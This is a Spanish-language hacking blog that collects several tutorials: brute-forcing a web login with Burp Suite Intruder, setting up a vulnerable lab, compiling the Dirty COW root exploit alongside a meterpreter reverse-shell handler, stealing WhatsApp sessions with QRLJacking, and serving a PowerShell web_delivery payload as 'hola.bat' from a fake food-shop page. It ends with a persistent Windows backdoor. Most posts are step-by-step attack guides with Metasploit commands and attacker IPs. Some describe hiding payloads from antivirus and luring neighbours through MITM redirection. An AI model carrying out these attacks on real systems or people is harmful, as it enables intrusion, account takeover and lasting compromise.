Saludos nuevamente mis queridos fieles lectores en esta oportunidad les enseñare a elaborar un ataque de fuerza bruta en plataformas web, con Burpsuiete.
Burpsuite es una herramienta creada en java, que tiene como objetivo fundamental auditar cualquier plataforma web, capturando los datos que se envíen para posteriormente ejecutar ataques.
antes de empezar les recomiendo que lean el primer post para que vayan configurando el proxy de Burpsuite en su navegador.
Plataforma para el ataque
como vemos esta plataforma es la escogí para elaborar la prueba de concepto, bueno ya hecho todo lo anteriormente mencionado, añadiremos cualquier credencial, lo importante es darle clip al botón y capturar los datos.
Luego de hacer todo lo siguiente, nos iremos al Burpsuite para ver lo capturado.
vemos que nos arrojo las respuesta que hemos enviado, lo que nosotros unicamente nos importa es la ultima linea: usuario=admin&contra=123456
esta fue la credencial sin validez que añadí, entonces señalaremos todo el texto, le daremos anticlip y escogeremos la opción "Send Intruder" y nos dirigiremos a la pestaña "Positions":
vemos que se marcan 3 lineas una de Cookie y las de abajo de las credenciales, en nuestro caso nosotros debemos quedarnos con las lineas:
usuario=§admin§&contra=§123456§
para ello pueden señalar toda la linea cookie y darle en "Clear $", o simplemente darle "Clear $" sin señalar nada eliminando todo los payloads escogidos por default y señal solamente los parámetros usuario y contra.
si notaron bien en la anterior imagen en la barra de "Attack Type", esta en Sniper, nosotros la cambiaremos por "Cluster Bomb".
debe quedar de la siguiente manera luego de ello entraremos a la pestaña "Payloads"
Deseo aclarar lo siguiente en la barra Payload set, Se activaran la cantidad de payloads escogidos en pestaña "Positions" en nuestro caso fueron "2". Aquí viene nuestra arma principal nuestro "Diccionario" le daremos en el boton de abajo donde dice "load" y cargaremos nuestro diccionario.
el primer payload fue "usuario" >>user.txt
El segundo payload fue "contra" >> pass.txt
El proceso se debe repetir para ambos, ya que son payloads diferentes, luego de ello le daremos en el botón "Start attack".
entonces se empezara nuestro ataque de fuerza bruta.
Vemos que estamos elaborando el ataque y tenemos respuestas "200", que en su mayoría son peticiones comunes estáticas de un modelo. pero si observamos la linea señalada esta con respuesta "302", significa que hemos entrado a un modelo diferente de donde hemos estado, en ciertas palabras conectándonos al panel administrativo.
Credencial correcta:
usuario=admin&contra=jacky
HTTP/1.1 302 Found
Date: Mon, 14 Nov 2016 01:33:19 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.5.38
X-Powered-By: PHP/5.5.38
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: admin/Administrador.php
Content-Length: 3884
Connection: close
Content-Type: text/html
Esto fue todo amigos, no olviden compartir la pagina y dejar su comentario. agradecer no cuesta nada. Saludos!!
Saludos mis fieles lectores en esta oportunidad, a pedidos de algunos seguidores de la fan page, enseñare a como crear tu laboratorio virtual desde tu sistema, cabe decir que los complementos utilizados en este escenario están disponibles para cualquier sistema operativo.
Para cualquier investigador de seguridad la mejor manera de auditar una plataforma es que este alojada en su propio laboratorio de pruebas por excelencia.
Emular sistemas operativos:
En este primer escenario sin duda es uno de los mas importantes en la rama de la seguridad informática, ya que se enfoca principalmente en sistemas públicos y privados, para encontrar fallas que afecten la privacidad de millones de usuarios y a su vez contengan puertas traseras (Backdoors).
Vulnerabilidades como el Shellshock, hasta el ultimo encontrado denominado Dirty COW se han encontrado en laboratorios virtuales por investigadores independientes.
Herramientas de emulación de sistemas operativos:
Vmware
Es una filial de EMC Corporation (propiedad a su vez de Dell Inc) que proporciona software de virtualización disponible para ordenadores compatibles X86. Entre este software se incluyen VMware Workstation, y los gratuitos VMware Server y VMware Player. El software de VMware puede funcionar en Windows, Linux, y en la plataforma mac OS que corre en procesadores Intel, bajo el nombre de VMware Fusion
Metasploitable es una máquina virtual Linux intencionadamente vulnerables. Esta máquina virtual se puede utilizar para llevar a cabo la formación en seguridad, herramientas de seguridad de prueba, y practicar técnicas de pruebas de penetración común.
El mundo del internet avanza demasiado tecnológicamente hablando, desde que se crearon plataformas web se optimizaron varios procesos que en la vida cotidiana eran muy molestos como por ejemplo depositar dinero en una cuenta, teníamos que hacer horas de cola, pero ahora no es así desde tu dispositivo móvil o tu ordenador puedes hacer eso en menos de 5 segundos por medio de una plataforma web de tu banca online.
La gran pregunta es: ¿Mis datos son seguros? ¿alguien puede obtener mis credenciales? ¿Hackearon la pagina del banco?
Pues si, estas preguntas son las mas frecuentes que cualquier usuario se preguntaría, entonces viene el gran reto de un investigador de seguridad.
"Reportar fallos que perjudican a los usuarios a nivel mundial y mejorar la seguridad informática día a día".
CMS - Sistemas de gestión de contenidos
Los CMS o Sistemas de gestión de contenidos son plataformas dedicadas especialmente para crear estructuras de soporte y administración de contenidos, principalmente en paginas web.
Existen varias plataformas las mas conocidas son.
Joomla, Wordpress, Drupal, etc.
Como bien sabemos existen varias vulnerabilidades en Plugins y complementos de los mencionados "CMS", ustedes pueden verificar en esta pagina dedicada a Exploits en todo tipo de plataformas:
digamos que para un investigador de seguridad web es fundamental tener algunos de estos gestores en su localhost para investigar posibles fallos y encontrar algunos 0days.
WordPress es un sistema de gestión de contenidos o CMS (por sus siglas en inglés, Content Management System) enfocado a la creación de cualquier tipo de sitio. Originalmente alcanzó una gran relevancia usado para la creación de blogs, para convertirse con el tiempo en una de las principales herramientas para la creación de páginas web comerciales.
Existen aplicaciones vulnerables web desarrolladas para realizar pruebas de Pentesting, en su mayoría la organización Owasp ha desarrollado buenos ejemplares, como también grupos independientes.
bWAPP
bWAPP, o una aplicación web con errores, es una fuente libre y abierto deliberadamente aplicación web insegura.
Ayuda a entusiastas de la seguridad, los desarrolladores y los estudiantes para descubrir y para prevenir vulnerabilidades web.
bWAPP lo prepara a uno para realizar pruebas de penetración exitosa y proyectos de hacking ético.
Lo que hace tan único bWAPP? Bueno, tiene más de 100 vulnerabilidades web!
Cubre todas las principales web bugs conocidos, incluyendo todos los riesgos del proyecto OWASP Top 10.
Es una aplicación web PHP / MySQL que es maldita vulnerables. Su objetivo principal es ser una ayuda para los profesionales de la seguridad para poner a prueba sus habilidades y herramientas en un entorno jurídico, ayudar a los desarrolladores web a comprender mejor los procesos de asegurar las aplicaciones web y para ayudar tanto a los estudiantes y profesores para aprender acerca de la seguridad de aplicaciones web en una clase controlada ambiente de la sala.
hace aproximadamente un mes, la comunidad linuxera (incluyéndome) se entero de una noticia que simplemente no se podría creer, un fallo de hace 9 años nuevamente estaba presente exponiendo un gran agujero de seguridad en las versiones: Ubuntu 14.04 y Ubuntu 15.10.
las consecuencias que con lleva son catastróficas, permite al atacante obtener privilegios root de manera remota, exponiendo todo el sistema de la victima sin ninguna excepción.
el bug también afecta a todos los dispositivos android de la versión 7 para abajo.
Elevando privilegios de usuario a root en Ubuntu 15.10
Lo primero que debemos hacer ver la fuente del archivo en 40616.c, lo puede hacer en cualquier editor de texto, en mi caso lo abrí por Sublime Text, para que puedan ver lo principal.
Vemos que el exploit esta generado en msfvenom quiere decir que es un payload.
Este exploit funciona de la siguiente manera, notaron que hay 2 payloads de 64 y 32 bits, por default el de 64bits esta sin comentarios cabe decir que funcionara solamente para esa arquitectura, ya que el de 32 bits esta comentado y no ejercerá ninguna función.
En esta prueba de concepto, estoy exponiendo un sistema "UBUNTU 32BITS", cabe decir que eliminare el payload de 64 bits con todos sus atributos, para quedarme solamente con la arquitectura de 32bits:
ojo: también eh eliminado los comentarios del payloads de 32 bits.
luego de guárdalo pasaremos a compilar el archivo .c
root@kali:~# gcc 40616.c -o 40616 -pthread
Una ves compilado correctamente, podemos subirlo al servidor de la victima creo que no hay necesidad de pasar a ese proceso ya que existen muchas maneras de hacerlo, si no sabes te invito a buscar los artículos de metasploit framework, en el blog.
Ustedes pueden crear su payload en formato linux, ya que deben hacerlo para poder ejecutar formatos compilados con permisos.
msf > use multi/handler msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.35 msf exploit(handler) > set LPORT 8081 msf exploit(handler) > exploit
Entonces le enviaremos nuestro payload a nuestra victima, en el momento que la victima ejecute tendremos su sesión meterpreter:
entramos a terminal y ejecutamos el "Exploit", vemos que se ejecuto correctamente, hemos escalado los privilegios root y por ende tenemos todos los permisos.
Siempre es bueno enseñar pruebas de todo, ejecutaremos el exploit en la misma maquina con un usuario llamado prueba:
./40616
El exploit funciono correctamente, esto fue todo estimados lectores espero les halla encantado este post.
Saludos fieles lectores en esta oportunidad les traigo una nueva herramienta salida del horno, que nos permite optimizar el proceso de robo de sesión por medio del código QR, hace una semana tuve un pequeño concurso en mi salón entre 3 proyectos innovadores, yo había elaborado un Software de identificación de medidas dactilares creado en Csharp conectado a un motor de base de datos como "SQL SERVER" + SDK digital personal, por lo cual tenia 2 grandes rivales.
un proyecto de realidad aumentada y otro basado en suscripción e inicio de sesión de usuarios por medio de código QR.
El ultimo día de exposición era un debate, en la cual se tenia que ver la manera de como matar el proyecto del contrincante buscando que fallas puede tener, entonces comente sobre el Robo de sesiones QRJacking.
los sistemas de autenticación basado en código QR que permite a los usuarios suscribirse rápidamente en una página web sin tener que memorizar o escribir cualquier nombre de usuario o contraseña.
Los códigos QR son códigos de barras bidimensionales que contienen una cantidad significativa de información tal como una cookie o clave de sesión compartida.
Entonces me puse a pensar, como le explico de manera entendible a mis compañeros de clase y mis docentes que desconocen el tema, entonces recordé la herramienta llamada QRLJacking, que nos permite automatizar este proceso.
root@kali:~# cd QRLJacking/QrlJacking-Framework root@kali:~# pip install -r requirements.txt
Luego de haber descargado los archivos e instalado los requerimientos de las librerias en python, pasaremos a ejecutarlo:
root@kali:~# python QRLJacker.py
Lo que haremos sera añadir la opción nuevo 1, Chat Applications, nuevamente escogeremos la opción 1 que es "WhatsApp", luego de ello nos aparecerá lo siguiente :
Port to listen on (Default 1337) :
Nos dice que puerto de escucha deseamos agregar para que corre la plataforma, en mi caso le añadí el puerto 8081.
Muy bien una ves hecho todo el procedimiento les saldra lo siguiente:
de igual manera en la terminal vemos que se generan varios reemplazos del archivo tmp.png, para resumir esto es que en la plataforma de whatsapp web cada 10 segundos se genera otro nuevo código QR por ende otra imagen y QRLJacking actualiza esa imagen en vivo para que la conexión sea exitosa.
Entonces como esta es una prueba de Test, deje la index.html de whatssap generado por QRLJacking por default.
si ustedes desean editarla es demasiado sencilla, se van al siguiente directorio:
root@kali:~# cd QRLJacking/QrlJacking-Framework
Entonces una ves que mi victima abra la pestaña de mi servidor malicioso, empezara a escanear el código :
En el momento precioso que la victima escanee el código, nosotros tendremos su sesión en segundo plano:
Muy sencillo verdad, ahora tu te preguntaras como mandar su servidor malicioso a tus vecinos que estén conectados a tu red, muy simple puedes ejecutar un MITM - dnspoof.
Con bettercap, MITMF, Xerosploit, Pythem!, hasta con el mismo Ettercap, si deseas ownear el sistema de tu victima te recomiendo utilizar Beef con cualquiera de las herramientas mencionadas y hacer la redirección en dicho framework:
Les dejare 2 posts,donde enseño a elaborar un MITM y utilizar el framework:
Saludos nuevamente mis queridos fieles lectores, en esta oportunidad les traigo un nuevo método de ataque de POST EXPLOTACIÓN por medio de un modulo llamado Web Delivery, que nos permite crear archivos "Maliciosos" con extensiones Python, php y powershell, en este tutorial utilizaremos la extensión universal por defecto de windows ps - Powershell.
Primero arrancaremos el framework metasploit, luego configuraremos el respectivo exploit:
-------------------------------------------------------------------------------------------------------------------------------- msf > use exploit/multi/script/web_delivery - Estableciendo Web Delivery LHOST => 192.168.1.35 - Nuestra IP LPORT => 8081 - Nuestro puerto de escucha msf exploit(web_delivery) > set URIPATH / - Directorio PATH del servidor msf exploit(web_delivery) > show targets msf exploit(web_delivery) > set target 2 - Escogimos 2 = PowerShell msf exploit(web_delivery) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(web_delivery) > exploit --------------------------------------------------------------------------------------------------------------------------------
una ves entendido lo anterior, lo que hicimos fue crear nuestro servidor meterpreter en escucha y nos apareció lo siguiente en las lineas abajo
Algunos quizás no tengan entendimiento de ello, se los simplificare de la siguiente manera, este es el código fuente del archivo powershell que nos permitirá obtener la conexión de nuestra victima una ves que ejecute dicho archivo.
Como vemos este archivo lo eh guardado en formato .bat, para camuflarlo de algunos AV, lo llame "hola.bat" y lo aloje a la carpeta: /var/www/html donde se almacena nuestro archivos del servidor local apache.
¿Ustedes se preguntaran porque?
Es simple porque pienso utilizar un index de una pagina de "Ventas" online de comida y adjuntar mi archivo infectado .bat en un botón.
Antes de pasar este proceso, activen su servidor apache:
solamente le reemplazan la URL original por su dirección de archivo.
Una vez hecho todo este proceso, le envían la URL a su victima en mi caso yo lo estoy asiendo en mi red local, ustedes pueden hacerlo desde una web externa si desean.
Como vemos en el momento que nuestra victima haga clic en el botón automáticamente se descargara nuestro archivo "hola.bat", entonces aquí viene lo mejor "La curiosidad del ser humano, cuando se presenta una oportunidad", quiere decir que una ves la victima ejecute el archivo, tendremos su sesión meterpreter.
Espero hallan aprendido algo nuevo de este servidor, para mi es un placer enseñarle lo poco que se.
Saludos fieles lectores en esta oportunidad les traigo un POST sobre como crear tu Backdoor persistente en msfconsole, ha pedido de un seguidor del blog que me dejo un mensaje en privado.
¿Que es Backdoor?
Se le domina como puerta trasera que se ejecuta mediante un "Script" remoto a la maquina de la victima con conexión puente al ordenador del atacante, dejando el sistema siempre en escucha.
El Backdoor persistente es compatible con todas las versiones de Windows.
Lo primero que deben tener en cuenta es lo siguiente, penetrar el sistema de tu victima, dejo los siguientes posts donde enseño como hacerlo por diferentes métodos, de igual manera burlar los "AV":
Luego de crear tu "Payload", posteriormente enviar el archivo infectado a tu victima tendremos su session meterpreter, en este caso haré la prueba de concepto en un Windows 7 service pack 1
Entonces lo que haremos sera ejecutar el comando persistente por default.
meterpreter > run persistence
voy a dejar bien claro lo siguiente, al ejecutar el comando run persistente estas dejando todo por Default, por ejemplo:
El puerto: 4444
IP: 192.168.1.35 (tu IP se adjuntara automáticamente)
Script Upload - directorio donde se alojara el Script vbs, que se ejecutara al momento que inicie el sistema de la victima.
Como vemos el archivo se subió correctamente en la carpeta por default.
Entonces reiniciaremos el equipo de la victima para ver si realmente nos carga su sesión meterpreter, pero antes configuraremos el puerto de escucha, ya que en la infección se utilizo el puerto 5555.
Esperemos que cargue nuevamente el sistema windows, pero vemos en la siguiente imagen que hemos cambiado el puerto de escucha reemplazando el 5555 a 4444 que fue generado al momento de ejecutar persistence.
Como podemos observar automáticamente hemos tenido la conexión meterpreter.
ahora viene la pregunta de muchos:
¿si yo deseo establecer una IP y puerto diferente?
Pues sencillo vamos a utilizar algunos argumentos de persitence, un ejemplo es el siguiente:
run persistence -U -i 5 -p 4444 -r 192.168.1.35
-U >> ejecuta automáticamente el usuario comprometido y establece logs. -i >> segundos de conexión para establecer. -p >> puerto de escucha. -r >> IP de la maquina del atacante a añadir.
Entonces le añadí de igual manera el puerto 4444, y deje mi IP estatica por default, ya que es mi maquina de ataque:
Reinicie bruscamente el windows 7, entonces esperaremos a que cargue nuevamente.
de igual manera hemos tenido su sesión meterpreter automáticamente, configurando nuestro propio script persistente.
Estudiante de Ingeniería de computación y sistemas en Perú.
actualmente me estoy dedicando a dar ponencias sobre seguridad Informática. Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.
Bienvenido a mi blog sobre Hacking, Seguridad Informática y Programación, antes de nada me presentaré, mi nombre es Omar y soy amante del Hacking Ético.